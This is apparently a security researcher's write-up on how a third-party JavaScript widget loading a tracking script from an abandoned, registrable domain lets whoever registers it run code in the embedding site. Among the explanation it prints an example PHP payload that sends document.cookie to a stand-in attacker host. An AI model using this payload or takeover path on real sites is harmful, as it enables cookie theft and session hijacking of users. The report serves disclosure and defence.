vaxo94
← Back to reports

Security report

How an Abandoned PHP Endpoint Became a Trusted JavaScript Execution Primitive

Modern web applications rely heavily on third-party JavaScript ecosystems.

Analytics systems, widgets, tracking providers, consent managers, embedded services, and monitoring platforms all introduce additional trust relationships into production environments.

Most organizations focus only on their visible infrastructure.

The real danger often exists several dependency layers deeper.

That is exactly what happened in this case.

The Discovery

During recursive supply-chain reconnaissance using my custom dependency intelligence framework, I identified a third-party JavaScript widget actively loaded by a production website.

The target environment imported an external widget script similar to: 

https://cdn-example-assets.com/widgets/embedded-widget.js

While statically analyzing the JavaScript source code, I identified logic responsible for dynamically constructing a remote tracking script URL: 

var trackURL = 'tracking-collector-example.net/event.php?id=' + widgetID;

The JavaScript later dynamically loaded this URL directly into the page: 

trackURL = (window.location.protocol == 'https:')
    ? 'https://' + trackURL
    : 'http://' + trackURL;

this.loadScript(trackURL);

loadScript = function(url) {
    var script = document.createElement("script");
    script.type = "text/javascript";
    script.src = url;
    document.getElementsByTagName("head")[0].appendChild(script);
};

The critical detail:

The referenced domain: 

tracking-collector-example.net

was abandoned and unregistered.

This meant an attacker could register the domain and inherit a trusted JavaScript execution path already embedded inside the dependency chain used by the target website.

Why This Was Extremely Dangerous

At first glance, this may appear to be a harmless analytics endpoint or legacy tracking functionality.

It was not.

The dangerous part was the dynamic: 

<script src>

loading behavior.

Browsers fully trust JavaScript loaded through script imports regardless of which domain serves the content.

That means if an attacker controls the referenced domain, the browser will execute attacker-controlled JavaScript directly inside the trusted page environment.

And unlike AJAX requests or API calls, the Same-Origin Policy does not prevent this behavior for script includes.

This effectively transforms an abandoned external domain into a remote browser-side execution primitive.

The Most Critical Detail: The PHP Endpoint Became Executable JavaScript

One of the most important aspects of this vulnerability was that the dynamically loaded resource ended with: 

event.php

Many people incorrectly assume that because the file uses a PHP extension, it somehow behaves like backend-only code from the browser’s perspective.

That assumption is dangerously wrong.

The browser does not care that the resource path ends with: 

.php

What matters is that the resource was loaded through: 

<script src="https://tracking-collector-example.net/event.php?id=...">

When a browser loads content through <script src>, the HTTP response body is interpreted and executed as JavaScript.

This means the PHP endpoint effectively became an attacker-controlled remote JavaScript execution endpoint.

In practice, the attack flow looked like this:

Target Website → loads third-party widget → widget dynamically loads abandoned PHP endpoint → attacker acquires abandoned domain → attacker controls JavaScript executed inside trusted pages

That distinction is critical.

The vulnerability was not merely about redirecting requests to an attacker-controlled server.

The attacker could generate arbitrary JavaScript responses from the PHP endpoint itself.

For example: 

<?php
header("Content-Type: application/javascript");

echo '
fetch("https://attacker-example.net/collect?cookie=" + encodeURIComponent(document.cookie));
';
?>

The server executes the PHP code.

But the browser receives the generated output as JavaScript and immediately executes it inside the trusted application environment.

That is what made this issue a true supply-chain execution vulnerability rather than a simple dangling-domain issue.

The Trust Chain Problem

This was not a direct vulnerability inside the primary target application itself.

The real weakness existed inside a trusted third-party dependency.

The effective dependency chain was:

Target Website → trusts third-party widget → third-party widget trusts abandoned domain → abandoned domain becomes attacker-controlled

That inherited trust relationship is what made the issue critical.

The target did not need to directly trust the attacker.

It only needed to trust something that trusted attacker-controlled infrastructure.

Potential Impact

Once the abandoned domain becomes attacker-controlled, arbitrary JavaScript can execute within any page embedding the vulnerable widget.

This creates an extremely dangerous client-side attack surface.

Possible impact includes:

  • session hijacking
  • credential theft
  • authentication token exfiltration
  • DOM manipulation
  • malicious redirects
  • phishing overlays
  • browser-side malware delivery
  • client-side supply-chain compromise
  • user impersonation
  • sensitive data interception

Because the JavaScript executes through a trusted dependency chain, malicious behavior may appear completely legitimate to end users.

That dramatically increases the effectiveness of phishing and credential harvesting attacks.

Why Recursive Dependency Analysis Matters

Traditional scanners often stop at first-level dependencies.

That is no longer sufficient for modern web ecosystems.

Today’s applications inherit trust across multiple nested third-party layers:

  • widgets
  • analytics providers
  • tracking systems
  • consent managers
  • marketing integrations
  • monitoring platforms
  • legacy external services

A forgotten domain hidden several layers deep inside a dependency chain may still possess browser-side execution privileges years later.

That is exactly why my framework focuses on recursive supply-chain analysis rather than shallow asset enumeration.

The goal is not simply discovering domains.

The real objective is identifying inherited trust relationships capable of becoming execution primitives.

Final Thoughts

This finding demonstrates one of the most dangerous realities of modern web security:

A production environment may unknowingly inherit JavaScript execution trust from infrastructure it no longer controls.

The attack path already existed.

The abandoned domain simply needed a new owner.

And once ownership changed, a forgotten analytics endpoint effectively became a trusted remote JavaScript execution primitive inside production pages.

That is the true danger of supply-chain compromise.

The attacker does not always need to breach the target directly.

Sometimes the attacker only needs to inherit the trust buried deep inside the dependency chain.